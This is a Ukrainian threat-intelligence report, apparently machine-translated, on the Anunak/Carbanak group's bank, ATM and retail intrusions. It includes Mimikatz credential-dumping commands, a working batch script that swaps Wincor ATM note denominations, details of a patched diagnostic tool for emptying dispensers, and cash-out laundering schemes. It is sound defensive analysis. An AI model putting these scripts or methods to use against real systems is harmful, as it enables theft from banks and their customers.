Технічний звіт про діяльність злочинної групи, що займається цільовими атаками - Anunak

У другій половині 2014 року ми вже неодноразово згадували про цільові атаки на великі фінансові установи як новий щабель шахрайства. Адже тепер грошові кошти викрадають не у «дрібних юросіб», а у великих фінансових компаній, в яких, здавалося б безпека повинна бути на вищому рівні і складність вчинення злочину наближається до «Hell». Однак, враховуючи не стихають потік подібних злочинів, а також особливої актуальності на тлі поточного фінансового стану країни, ми вирішили оновити посаду і додати нових подробиць відносно групи Anunak, яка використовує однойменного трояна, також відомого як Carbanak. Назва Carbanak походить від склеювання двох слів Anunak+Carberp.

Короткий екскурс

Після затримань членів групи Carberp в Росії, деякі учасники залишилися без роботи, однак, отриманий за довгі роки роботи досвід дозволив їм зайняти нову нішу. Один з учасників швидко зрозумів, що можна вкрасти тисячу разів по $2 000 і заробити 2 мільйони доларів, а можна вкрасти всього лише один раз і відразу всю суму.

З 2013р. активізувалася організована злочинна група, націлена на банки та електронні платіжні системи Росії і пост радянського простору. Особливістю є те, що шахрайство відбувається всередині корпоративної мережі, з використанням внутрішніх платіжних шлюзів і банківських систем. Таким чином грошові кошти викрадаються не у клієнтів, а у самих банків і платіжних систем. Якщо доступ був отриманий зловмисниками в мережі державного підприємства, метою зловмисників є промислове шпигунство.

Основний кістяк злочинної групи складають громадяни Росії та України, однак є особи, які надають їм підтримку з Білорусії.
Середня сума розкрадання на території Росії і пост радянського простору становила 2 мільйони доларів США за курсом осені 2014р. З 2013 року ними були успішно отримані доступи в мережі понад 50 Російських банків та 5 платіжних систем, деякі з них були позбавлені банківської ліцензії. На поточний момент загальна сума розкрадань становить більше 1 мільярда рублів (близько 300 мільйонів доларів США), велика частина якої припадає на друге півріччя 2014р.

Середній час від моменту проникнення у внутрішню мережу фінансової організації до моменту розкрадання становить 42 дні.
В результаті доступу у внутрішні мережі фінансової організації хакерам вдавалося отримувати доступ до серверів управління банкоматами і заражати їх своїми шкідливими програмами, що дозволяло в подальшому спустошувати їх по команді. Також результатом проникнення в мережу був доступ до управління платіжними шлюзами (у разі платіжних систем) та рахунками банку.

З 2014 року учасники злочинної групи почали активно проявляти інтерес до Європейських рітейл компаніям.

Для проникнення у внутрішню мережу використовуються цільові розсилки по електронній пошті, або через інші бот-мережі, для чого постійно підтримується контакт з власниками великих бот-мереж. З серпня 2014 року вони почали створювати свою велику бот-мережу використовуючи масові розсилки по електронній пошті, а не Driveby.

Атаки в Росії

Перше успішне пограбування банку було скоєно ними в січні 2013 року. У всіх перших випадках зловмисники використовували для віддаленого доступу в мережу банку програму RDPdoor, а для видалення слідів і виведення Windows комп'ютерів і серверів з ладу програму MBR Eraser. Обидві програми використовувалися учасниками злочинної групи Carberp, якою керував Germes. Для зниження ризиків втратити доступ у внутрішню мережу банку, крім шкідливих програм, зловмисники використовували і легітимні програми для віддаленого доступу як Ammy Admin і Team Viewer. Надалі від використання RDPdoor і Team Viewer зловмисник повністю відмовилися.

Крім самих банківських та платіжних систем хакери отримували доступ до серверів електронної пошти, для контролю всіх внутрішніх комунікацій. Це дозволяло їм з'ясувати, що в мережі банку була зафіксована аномальна активність як вона була встановлена і які заходи будуть вживатися співробітниками банку для вирішення проблеми. Контроль над поштою успішно встановлювався незалежно від того, був це MS Exchange або Lotus. Це дозволяло їм брати зворотні заходи, дозволяючи співробітникам банків і платіжних систем отримати відчуття що проблема була вирішена.

Основні етапи розвитку атаки:
1. Первинне зараження комп'ютера рядового співробітника.
2. Отримання пароля користувача з адміністративними прорвами на деяких комп'ютерах. Наприклад, фахівець технічної підтримки.
3. Отримання легітимного доступу до серверів.
4. Компрометація пароля доменного адміністратора сервера.
5. Отримання доступу на контролер домену і компрометація всіх доменних активних облікових записів.
6. Отримання доступу до серверів електронної пошти і документообігу.
7. Отримання доступу до робочих станцій адміністраторів серверів і банківських систем.
8. Установка програмного забезпечення для контролю активності операторів цікавлять їх систем. Зазвичай це фото і відео фіксація.
9. Налаштування віддаленого доступу до потрібних серверів включаючи зміни на міжмережевих екранах.


Інструменти

Для проведення цільових атак в 2014 році зловмисники закінчили розробку своєї основної шкідливої програми Anunak, яка використовується разом з наступними інструментами:

Mimikatz — для отримання паролів від локальних і доменних облікових записів
MBR Eraser — для виводу операційної системи з ладу
SoftPerfect Network Scanner — для сканування локальної мережі
Cain & Abel — для отримання паролів
SSHD-бекдор — для отримання паролів і віддаленого доступу
Ammy Admin — віддалене управління
Team Viewer — віддалене управління

Основною шкідливою програмою є «Anunak» за класифікацією нашої лабораторії. Це троянська програма використовується тільки для цільових атак, переважно на банки та платіжні системи. Цільове використання дозволяє їй залишатися малодослідженою, що забезпечує їй гарну живучість всередині корпоративних мереж. При написанні даної шкідливої програми в деяких місцях використовувався вихідний код від банківської троянської програми «Carberp».

«Anunak» володіє наступним набором функціональних можливостей.

У нього інтегроване програмне забезпечення під назвою «Mimikatz». Це програмне забезпечення з відкритим вихідним кодом, що дозволяє отримувати паролі облікових записів користувачів, що зробили вхід в систему Windows. Однак дане програмне забезпечення суттєво змінено: при збереженні функціональних можливостей щодо отримання паролів облікових записів був прибраний функціонал взаємодії з користувачем, інформація про помилки та хід виконання програми. Таким чином, при запуску шкідливої програми на сервері, потай будуть скомпрометовані всі доменні і локальні облікові записи, включаючи облікові записи адміністраторів. Для того щоб отримати паролі від облікових записів достатньо ввести послідовно дві команди: «privilege::debug» і «sekurlsa::logonpasswords». При потрапляння цієї програми на контролер домену, або сервер електронної пошти, компрометируются практично всі облікові записи домену, включаючи адміністраторів.

Також існує можливість додавання файлу досліджуваної програми виключення міжмережевого екрану шляхом створення відповідного правила через утиліту «Netsh».

У програмі реалізований функціонал перехоплювача натиснутих клавіш і присутня можливість створення знімків екрану.

Присутній функціонал, який взаємодіє з банківською системою iFOBS.

На сервер управління шкідливою програмою проводиться відправлення ключової інформації, знімків екрану і архівів у форматі «cab».

Програма здатна потай вносити зміни в ряд системних файлів імовірно з метою зняття обмеження настільних версій операційних систем Microsoft Windows» на кількість користувачів, які можуть одночасно підключитися до керованої даною операційною системою ЕОМ за протоколом RDP з метою здійснення їх віддаленого адміністрування.

Існує можливість завантаження і запуску довільних файлів з керуючого сервера. Одним з таких файлів є програма «AmmyAdmin», яка здатна запуститися з аргументами «-service» і «-nogui», що призведе до її запуску в якості служби і без інтерфейсу користувача. «AmmyAdmin» дозволяє по IP адресою і унікальному ідентифікатору з'єднуватися через сервер «rl.ammyy.com» з іншими ЕОМ, мають таке ж програмне забезпечення. У результаті з'єднання зловмисник отримує віддалений доступ до ЕОМ користувача з запущеним «AmmyAdmin» в обхід міжмережевих екранів. Знімок вікна представлений на малюнку нижче:

image

При отриманні доступу до серверів під управлінням операційних систем сімейства Linux зловмисники використовують SSH-бекдор передає на сервер зловмисників дані про логіни/паролі, які використовуються для доступу до сервера, а також надає віддалений доступ зловмисникам.

Для забезпечення доступу до потрібних серверів правила на міжмережевих екранах Microsoft ГММ, CISCO і т. п. можуть бути відповідним чином змінено.

Коли у зловмисників ще не було основною шкідливої програми, яка проводила б приховану установку «AmmyAdmin» і повідомляла б зловмисникам пароль для віддаленого доступу, вони використовували сторонню шкідливу програму відому як «Barus». Дана шкідлива програма використовується вкрай рідко і останній раз зустрічалася нам в 2013 році. Шкідлива програма є розробкою російськомовних авторів. В панелі керування можна помітити полі «Ammy ID» використання якого дозволяла зловмисникам здійснювати віддалене підключення.



Методи поширення шкідників

На самому початку своєї діяльності у 2013 році через відсутність цільового трояна зловмисники почали поширювати Andromeda і Pony. Поширювали зазначені шкідливі програми методів Driveby через зв'язку експлойтів Neutrino Exploit Kit, як показано на малюнку нижче. Цікаво, що джерелом трафіку восени 2013 року для них був сайт php.net/. Трафік з цього ресурсу вони перенаправляли на зв'язки ще з липня 2013 року, але даний факт був виявлений значно пізніше. Ім'я одного з потоків для поширення шкідливої програми «LOL BANK FUCKIUNG», що відповідало їх діяльності.



Паралельно з цим вони використовували й інший спосіб заражень, який був одним з основних. Основним способом поширення надсилання листів з шкідливим вкладенням від імені Центрального банку РФ, потенційного клієнта, або реально існуючого контрагента (до акаунта якого попередньо здійснюється доступ, далі робиться розсилка по контакт-листу).

Другим поширеним способом є установка спеціальної шкідливої програми для проведення цільових атак з допомогою іншої шкідливої програми, яка могла потрапити в локальну мережу випадковим чином. Для виявлення подібних шкідливих програм, злочинна група підтримує зв'язок з декількома власниками великих бот-мереж, масово поширюють свої шкідливі програми. Купуючи у таких власників бот-мереж відомості про IP-адреси, де встановлені їх шкідливі програми зловмисники перевіряють IP-адреси на приналежність фінансових і державним структурам. Якщо шкідлива програма, яка їх цікавить підмережі, то зловмисники платять власнику великої бот-мережі за встановлення їх цільової шкідливої програми. Подібні партнерські стосунки з власниками бот-мереж Zeus, Shiz Ranbyus. Всі зазначені троянські програми є банківськими і пояснюються минулими стосунками. В кінці 2013 року хакер під псевдонімом Dinhold почав будувати свою бот-мережу на модифікованому Carberp, що після викладання у відкритий доступ його вихідних кодів. З ними були спроби налагодити аналогічне взаємодія, однак, в 2014 році він був заарештований не встигнувши розвинути свою бот-мережу до необхідного рівня.

Для перевірки IP-адреси на приналежність потрібної мережі використовувався наступний скрипт:

#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
from bulkwhois.shadowserver import BulkWhoisShadowserver
iplist_file = 'ip.txt'
path = os.path.dirname(os.path.abspath(__file__))
bulk_whois = BulkWhoisShadowserver()
iplist = []
with open(os.path.join(path, iplist_file)) as f:
for line in f:
iplist.append(line.strip())
result = bulk_whois.lookup_ips(iplist)
with open(os.path.join(path, 'data.txt'), 'a') as f:
for record in result:
f.write('IP: %s\
CC: %s\
Org. Name: %s\
Register: %s\
AS Name: %s\
BGP Prefix: %s\
-------------------------------------------------------\
'% (result[record]['ip'], result[record]['cc'], result[record]['org_name'], result[record]['register'], result[record]['as_name'], result[record]['bgp_prefix']))

Найбільш небезпечними є розсилання від імені партнерів з якими фінансові та державні установи здійснюються постійний обмін даними по електронній пошті. Приклад подібної поштової розсилки стався 25 вересня 2014 року, 14:11 з електронної поштової адреси «Elina Shchekina <e.shekina@rbkmoney.com>» тема листа «Оновлена версія договору». Вкладення «договор.doc» експлуатує уразливість CVE-2012-2539 і CVE-2012-0158. Розсилка була проведена на більш ніж 70 адрес різних компаній (причому в рамках однієї компанії могло бути декілька адрес отримувачів).



Лист з шкідливим вкладенням (md5: AA36BA9F4DE5892F1DD427B7B2100B06) в архіві з паролем від потенційного клієнта, відправленого менеджеру банку після попередньої телефонної розмови з ним. Дзвінок здійснювали р. з Санкт-Петербург.





Вміст текстового файлу з ім'ям «реквізити.doc»

ТОВ «Компанія Наше Століття»
109387, Росія, р. Москва,
вул. Аносова, д. 24, офіс 409
Тел. (495) 124-99-77 факс: (495)124-99-77
Тел. сот. (962) 7135296
E-mail:x60x@nxt.ru
ІПН 7329001307 КПП 732901001
р\р 40702810613310001709
Філія ВТБ 24 (ЗАТ) р. Москва
До\з 30101810700000000955
БИК 043602955


Лист від імені Центрального банку Росії з шкідливим вкладенням (md5: 8FA296EFAF87FF4D9179283D42372C52), що експлуатують уразливість CVE-2012-2539 з метою виконання довільного коду.

Також були інші приклади листів зі шкідливими вкладеннями, як наприклад відправка листів з файлом «001. photo.exe».







Атаки на банкомати
Наявність доступу у внутрішні мережі банків відкривають широкі можливості для хакерів. Однією з таких можливостей було отримання доступу до банкоматів із спеціальних сегментів мережі, які повинні були бути ізольовані. Підтверджено, що дана злочинна група отримала доступ до 52 банкоматів. Сума збитку перевищує 50 мільйонів рублів. В результаті отримання доступу до банкоматів, залежно від моделі банкомата, хакери застосовували різні схеми.

Підміна номіналу


При отриманні доступу зловмисники завантажували шкідливі скрипти і змінювали в реєстрі операційної системи банкомату номінали видаються купюр. В результаті, при запиті на отримання 10 купюр номіналом 100 рублів, зловмисник отримували 10 купюр номіналом 5000 рублів. Використовувані ними шкідливий скрипт і програма були розроблені для платформи Wincor.

Шкідливий скрипт містив наступні команди:
Вміст файлу «1.bat»

REG ADD «HKEY_LOCAL_MACHINE\SOFTWARE\Wincor Nixdorf\ProTopas\CurrentVersion\LYNXPAR\CASH_DISPENSER» /v VALUE_1 /t REG_SZ /d «5000» /f
REG ADD «HKEY_LOCAL_MACHINE\SOFTWARE\Wincor Nixdorf\ProTopas\CurrentVersion\LYNXPAR\CASH_DISPENSER» /v VALUE_2 /t REG_SZ /d «1000» /f
REG ADD «HKEY_LOCAL_MACHINE\SOFTWARE\Wincor Nixdorf\ProTopas\CurrentVersion\LYNXPAR\CASH_DISPENSER» /v VALUE_3 /t REG_SZ /d «500» /f
REG ADD «HKEY_LOCAL_MACHINE\SOFTWARE\Wincor Nixdorf\ProTopas\CurrentVersion\LYNXPAR\CASH_DISPENSER» /v VALUE_4 /t REG_SZ /d «100» /f
REG ADD «HKEY_LOCAL_MACHINE\SOFTWARE\Wincor Nixdorf\ProTopas\CurrentVersion\LYNXPAR\CASH_DISPENSER» /v VALUE_1 /t REG_SZ /d «100» /f
REG ADD «HKEY_LOCAL_MACHINE\SOFTWARE\Wincor Nixdorf\ProTopas\CurrentVersion\LYNXPAR\CASH_DISPENSER» /v VALUE_4 /t REG_SZ /d «5000» /f
shutdown-r-t 0-f


Після виконання даного файлу змінюються ключі реєстру, гілки реєстру ««HKEY_LOCAL_MACHINE\SOFTWARE\Wincor Nixdorf\ProTopas\CurrentVersion\LYNXPAR\CASH_DISPENSER»», що відповідають за номінал касет в банкоматі. В результаті виконання даного файлу ключ реєстру, який відповідає за касету номер 1 (VALUE_1), приймає значення «100», а ключ реєстру, який відповідає за касету номер 4 (VALUE_4), приймає значення «5000». Після чого подається команда на перезавантаження ЕОМ.

Еталонне значення ключів реєстру:

VALUE_1 — 5000
VALUE_2 — 1000
VALUE_3 — 500
VALUE_4 — 100

У разі, якщо фактична завантаження банкомата відповідає еталонній, то при зміні ключів реєстру при видачі купюр з касети №1, будуть видаватися купюри номіналом «5000» замість «100».

Спустошення диспенсера


Крім того, зловмисники використовували модифіковану налагоджувальну програму, яка дозволяла по команді здійснювати видачу грошей з диспенсера. Оригінальна відлагоджувальна програма здійснює видачу грошових коштів через диспенсер тільки при зафіксованому відкритому корпусі банкомату і двері сейфа. Щоб забезпечити видачу грошей з закритим банкоматом, зловмисникам довелося модифікувати оригінальну програму «KDIAG32» (оригінальний файл: розмір 1 128 960 MD5 4CC1A6E049942EBDA395244C74179EFF).


Малюнок: Сервісна програма KDIAG32 для банкоматів Wincor

Порівняння оригінальної версії програми з модифікованою показало, що різниця тільки в ігноруванні помилки", «Door not opened or missing!»". На малюнку нижче наведено повідомлення про помилку, яке ніколи не буде показано користувачеві в досліджуваному файлі:

Малюнок: Приховане вікно в оригінальній програмі KDIAG32

Андромеда

Розбираючи один з інцидентів всі сліди вказували на те, що працювала та ж сама злочинна група. Для віддаленого доступу використовувався Ammy Admin, на Unix-серверах стояв той самий SSHD-бекдор і більш того він був завантажений з того ж зламаного сервера, що і в інших випадках з використанням трояна Anunak. Однак, у цьому інциденті в якості основного трояна використовувався не Anunak, а Andromeda. Сервери управління перебували в Казахстані, Німеччині та Україні. Перевірка серверів управління показала, що це був Bulletproof хостинг, які крім серверів надає послугу проксі серверів трафіку через свою інфраструктуру і використання TOR і VPN, що значно відрізнялося від схеми хостингу Anunak. Перевірка переведення в готівку грошей показала, що використовувалася та ж злочинна група обналу, що і для Anunak, що ще раз підтвердило їх взаємозв'язок.

Отримані примірники трояна Andromeda поширювалися з серпня 2014 року по електронній пошті. В якості ключа шифрування RC4 використовувалося значення 754037e7be8f61cbb1b85ab46c7da77d, яке є MD5 хешем від рядка «go fuck yourself». В результаті такої розсилки з серпня по кінець жовтня бот-мережу Andromeda зросла до 260 000 ботів. Успішне зараження в одній підмережі призводило до розсилання таких листів іншим співробітникам банків на основі контакт-листа співробітника. Приклад пересилання з мережі зараженого банку співробітникам іншого банку показаний нижче.



В результаті такої віялової розсилки були заражені багато компаній нафтогазового сектора, банки та державні установи. У Росії таким чином було заражено мінімум 15 банків і 2 платіжні системи.

Листи з подібними вкладеннями поширювалися з наступними темами:

«My new photo»
«Alert Transactions Report by users from 2014-09-28 to 2014-09-28»

Схеми переведення в готівку

Попередньо, варто відзначити той факт, що процес виведення викрадених грошових коштів (готівки) відрізнявся, по-перше, виходячи зі способу розкрадання, по-друге типу жертви (банк або платіжна система), по-третє із загальної суми розкрадання.

За типом жертви швидше поділялися на підставі типів контрагентів, робота з якими накладала ті чи інші обмеження. Наприклад, всі платежі були зобов'язані пройти через певний пул посередників. Додатково, «позаштатний» пул контрагентів міг викликати підозри і непотрібні перевірки (ручна обробка платіжних доручень).

Банк (суми до 100млн. рублів):


У разі отримання метою зловмисників) контролю над АРМ КБР, в основному, схема була класичним деревом, коли грошові кошти з рахунку банку спрямовувались на кілька юридичних осіб, далі від кожного юр. особи на більш дрібні юр. особи (таких ітерацій могло бути кілька), далі на карти фізичних осіб (від 600 до 7000 транзакий).

У разі отримання метою зловмисників) контролю над сервісом управління банкоматами, грошові кошти виходили безпосередньо з банкомата по команді зловмисника. В даному випадку весь процес обналу полягав у тому, щоб дроп знаходився біля банкомату в зазначений час і був на зв'язку зі зловмисником, що мають доступ до сервера управління банкоматами, з мішком, в який потім відбувалося спустошення диспенсера.

Банк (суми понад 100млн. рублів):


Грошові кошти направлялися на рахунки інших банків, причому найчастіше були використані «зламані» банки, у яких заздалегідь готувалися рахунки й пластикові картки.

Платіжна система:


Крім всіх перерахованих вище способів були також задіяні канали відправки грошових коштів через системи розрахунків, електронні гаманці та платіжні системи, типу web money, яндекс гроші, QIWI (1500-2000 транзакцій). Були зафіксовані надходження великих сум (до 50млн.) на окремі картки фізичних осіб, які в подальшому займалися купівлею по цій карті дорогих негабаритних товарів, таких як ювелірні вироби, наручний годинник та інша атрибутика. Величезна частина коштів відправлялася на мобільних операторів (підготовлені заздалегідь 1500-2000 сім-карт).

Навесні 2014 року (розквіт цього виду шахрайств) були відомі 2 групи обнальщиков, що працюють по супроводженню цільових атак, до осені 2014 року їх кількість збільшилася до 5. У загальному числі цей ріст пов'язаний і з кількістю розкрадань (число жертв + середня сума розкрадання на 1 жертву). Групи працюють в різних містах для забезпечення кращої роздрібненості обналу. Також дані групи входять вихідці з близького зарубіжжя, які в разі необхідності (великий «проект») прибували в зазначений місто. Кожна з груп контролювалася окремою людиною. До складу групи входить близько 15-20 чоловік.

Частина грошей йшли в Україну і Білорусію.

Шкідливі семпли

Anunak




Mimikatz




Andromeda




MBR_Eraser




Email attachments




Атаки в Європі і США

У той час як атаки на Російські банки і платіжні системи тривали останні два роки, то атаки на рітейл почалися тільки в другому кварталі 2014 року. Поки є підтверджена інформація про трьох витоках даних карт і більше десяти випадків отримання доступу в локальні мережі рітейлових компаній, що стає серйозною загрозою.

Крім роздрібних організацій, також відомо про успішні атаки на медіа та PR компанії в 2014 році. Достовірно не відомо яка була мета проникнення в мережі таких компаній, але можна припустити, що вони шукали інсайдерську інформацію, свого роду промисловий шпіонаж, що дозволяє їм отримати перевагу на фондовому ринку. Оскільки у цих компаній нічого не пропадало, а результат від шахрайства складно зіставити з чимось конкретним, такі інциденти зазвичай ніколи не пов'язують в єдине ціле.

Способи зараження



Щодо атак на рітейлові компанії, перші зараження в 2014 році Anunak були зроблені за допомогою широко поширеною шкідливою програмою для майинга криптовалют, заснованої на банківському трояне Gozi/ISFB. За нашими оцінками протягом першої половини 2014 року з допомогою цього трояна було заражено близько підлозі мільйона систем по всьому світу, проте в Росії та кількох пост радянських країнах цей троян не поширювався. Для пошуку цікавих хостів серед безлічі протрояненых систем шкідлива програма збирає у системі такі відомості як реєстраційні дані Microsoft Windows і мережевому домені Windows.

Троян заснований на Gozi/ISFB використовувався для завантаження додаткових компонент на питання хакерів системи, включаючи корисні навантаження Metasploit/Meterpreter і різні версії Anunak. Для групи Anunak доставляти свої шкідливі програми через чужі бот-мережі був основним методом в середині 2014 року.

Нещодавно вони стали використовувати й інші методи, включаючи фішингові листи англійською мовою, бот-мережу Andromeda а також SQL-ін'єкції для злому компаній зовні.

Зломи POS-терміналів



Перші атаки за допомогою Anunak на POS термінали були навколо терміналів виробництва Epicor/NSB. Для таких атак у Anunak є спеціальний код для атаки на термінали згаданого виробника, який на відміну від більш широко поширених сканерів пам'яті на наявність дані карт збирає величезну кількість інформації за платежами здійснюються за допомогою карт. Перша така атака була зафіксована у липні 2014 року, але можливо, що були і більш ранні.

Більш свіжі атаки здійснювалися з допомогою зробленої на замовлення програми для POS терміналів, яка є більш простий, але надійніше збирала дані карт пам'яті. Первісна версія з початку осені 2014 року використовувала простий чорний список, видирала кожен процес і робила дамп даних карт відкритим текстом. Більш пізні версії сканували тільки певні налаштуваннями процеси і використовувала алгоритм RC4 для шифрування отриманих даних карт на диску.

Додаткові цілі



У той час як рітейлові організації є основною метою через своїх можливостей по обробці платежів, інші зламані компанії мають не пряму, а опосередковану мету, наприклад, для отримання різних баз даних або іншої інформації, що представляє інтерес для злочинної групи. Важливим для них є і список корпоративних адрес електронної пошти, які потім використовуються для підвищення шансів на успішне зараження.

На поточний момент у нас немає ніяких відомостей про успішні атаки на європейські, американські банки і платіжні системи в 2014 році. Більшість заражень в Європі — це виділені сервери, які використовувалися в якості вихідних VPN-сайтів Російських компаній і іноді сервери, які використовуються зловмисниками для проведення власного тестування. Незважаючи на відсутність будь-яких свідоцтв про успішні атаки на європейські, американські банки варто відзначити, що використовувані атакуючими методи можуть бути легко використані за межами Росії та України.

методи



Група використовує Metasploit як один з основних своїх хакерських інструментів. Вони активно використовують сканування портів та збір відомостей про систему, підвищення привілеїв використовуючи, наприклад, вразливість CVE-2014 — 4113, збирають реквізити доступу і перескакують на інші системи та мережі. Metasploit використовується з-за свого широкого потенціалу по скануванню, експлуатації вразливостей, підвищення привілеїв і своєї живучості після експлуатації.

На цікавих і критичних системах можуть бути знайдені типові хакерські інструменти для встановлення тунелів за межі мережі, інші інструменти, що входять до складу Metasploit, наприклад, Meterpreter, але також і інші інструменти для забезпечення живучості. Ми спостерігали методи зворотного підключення по SSL через порт 443, а також через DNS порт 53. Атакуючі використовують BITS для завантаження файлів, але також використовують і вбудований в Windows PowerShell для завантаження і виконання команд. Нарешті на критичних системах встановлюється свіжа зашифрований та не яку детектують антивірусами версія Anunak.

Anunak використовує різні методи підключення до своїх серверів, включаючи PHP-сервер доступний з HTTP і HTTPS, а також Windows-сервер компонент використовує власний протокол.

Джерело: Хабрахабр

0 коментарів

Тільки зареєстровані та авторизовані користувачі можуть залишати коментарі.